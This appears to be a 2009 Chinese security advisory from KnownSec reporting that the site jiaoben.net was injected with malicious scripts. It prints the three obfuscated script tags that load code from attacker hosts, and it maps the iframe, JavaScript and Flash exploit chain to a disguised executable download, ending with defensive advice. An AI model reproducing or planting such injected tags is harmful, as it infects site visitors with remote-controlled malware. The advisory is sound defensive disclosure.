发布时间:Tue Oct 20 2009 19:06:43 UTC+0800
最后更新时间:Tue Oct 20 2009 19:06:43 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国脚本网(http://www.jiaoben.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.jiaoben.net/

网页被嵌入恶意链接代码:
<script language=”JavaScript” id=”scr7ipt7467″ src=”http://pt9%328.9966.org” type=”text/javascript”  ></script>
<script language=”JavaScript” type=”text/javascript” id=”scripst9001″ src=”http://fd105.3322.o%72g“  ></script>
<script language=”JavaScript” type=”text/javascript” id=”microsoft7427″ src=”http://fd106%2E3322%2Eorg“  ></script>

挂马分析:
[root]http://www.jiaoben.net/
    [script]http://www.jiaoben.net/common/script/vdcs.js
        [script]http://fd106.3322.org
        [script]http://fd105.3322.org
        [script]http://pt928.9966.org
    [script]http://www.jiaoben.net/common/script/vdcs.pop.js
        [script]http://fd106.3322.org
        [script]http://fd105.3322.org
        [script]http://pt928.9966.org
    [script]http://www.jiaoben.net/common/script/joekoe_cms.js
        [script]http://fd106.3322.org
        [script]http://fd105.3322.org
        [script]http://pt928.9966.org
    [script]http://pt928.9966.org
        [iframe]http://jz1014.3322.org/jj/4.htm
            [iframe]http://h8ae8.cn/x15/xx.html
                [iframe]http://h8ae8.cn/x15/td14.htm
                    [script]http://h8ae8.cn/x15/14.js
                        [exe]http://d.iopqw.com/xx/x15.css
                    [script]http://h8ae8.cn/x15/15.js
                    [script]http://h8ae8.cn/x15/17.js
                    [script]http://h8ae8.cn/x15/16.js
                    [script]http://h8ae8.cn/x15/18.js
                [iframe]http://h8ae8.cn/x15/yt.htm
                    [script]http://h8ae8.cn/x15/pps.jpg
                    [script]http://h8ae8.cn/x15/url.jpg
                        [exe]http://d.iopqw.com/xx/x15.css
                    [script]http://h8ae8.cn/x15/c.jpg
                    [script]http://h8ae8.cn/x15/d.jpg
                    [script]http://h8ae8.cn/x15/e.jpg
                    [script]http://h8ae8.cn/x15/f.jpg
                [iframe]http://h8ae8.cn/x15/td09.htm
                    [script]http://h8ae8.cn/x15/01.js
                        [exe]http://d.iopqw.com/xx/x15.css
                    [script]http://h8ae8.cn/x15/02.js
                [iframe]http://h8ae8.cn/x15/yut.htm
                    [iframe]http://h8ae8.cn/x15/ytfl1.htm
                        [iframe]http://h8ae8.cn/x15/x1.htm
                            [script]http://h8ae8.cn/x15/swfobject.js
                            [flash]http://h8ae8.cn/x15/./x1.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x3.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x4.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x2.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                        [iframe]http://h8ae8.cn/x15/x2.htm
                            [script]http://h8ae8.cn/x15/swfobject.js
                            [flash]http://h8ae8.cn/x15/./x7.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x9.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x10.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x8.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                        [iframe]http://h8ae8.cn/x15/x1.htm
                    [iframe]http://h8ae8.cn/x15/of.htm
                        [script]http://h8ae8.cn/x15/of.js
                            [exe]http://d.iopqw.com/xx/x15.css
                        [script]http://h8ae8.cn/x15/of3.jpg
                        [script]http://h8ae8.cn/x15/of.jpg
                        [script]http://h8ae8.cn/x15/of2.jpg
                [iframe]http://h8ae8.cn/x15/ytu.htm
                    [iframe]http://h8ae8.cn/x15/ytfl.htm
                        [iframe]http://h8ae8.cn/x15/ff.html
                            [script]http://h8ae8.cn/x15/ff.js
                            [exe]http://d.iopqw.com/xx/x15.css
                        [iframe]http://h8ae8.cn/x15/ie.html
                            [script]http://h8ae8.cn/x15/ie.js
                            [exe]http://d.iopqw.com/xx/x15.css
                        [iframe]http://h8ae8.cn/x15/ff.html
                        [iframe]http://h8ae8.cn/x15/ie.html
                        [iframe]http://h8ae8.cn/x15/ff.html
                        [iframe]http://h8ae8.cn/x15/ff.html
    [script]http://fd105.3322.org
        [iframe]http://jz1014.3322.org/jj/4.htm
    [script]http://fd106.3322.org
    [script]http://www.jiaoben.net/skin/default/shop/shop.js
        [script]http://fd106.3322.org
        [script]http://fd105.3322.org
        [script]http://pt928.9966.org
    [iframe]http://spcode.baidu.com/spcode/spstyle/style2927.jsp?tn=jiaoben_sp&ctn=0&styleid=2927
    [script]http://pt928.9966.org
    [script]http://fd105.3322.org
    [script]http://fd106.3322.org
    [script]http://www.jiaoben.net/support/vote.asp
        [script]http://pt928.9966.org
        [script]http://fd105.3322.org
        [script]http://fd106.3322.org
    [script]http://www.jiaoben.net/xml/links.asp?sort=fir
    [script]http://www.jiaoben.net/xml/links.asp?sort=fir_txt
    [script]http://js.users.51.la/1147560.js
最终下载病毒文件:
http://d.iopqw.com/xx/x15.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:11
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]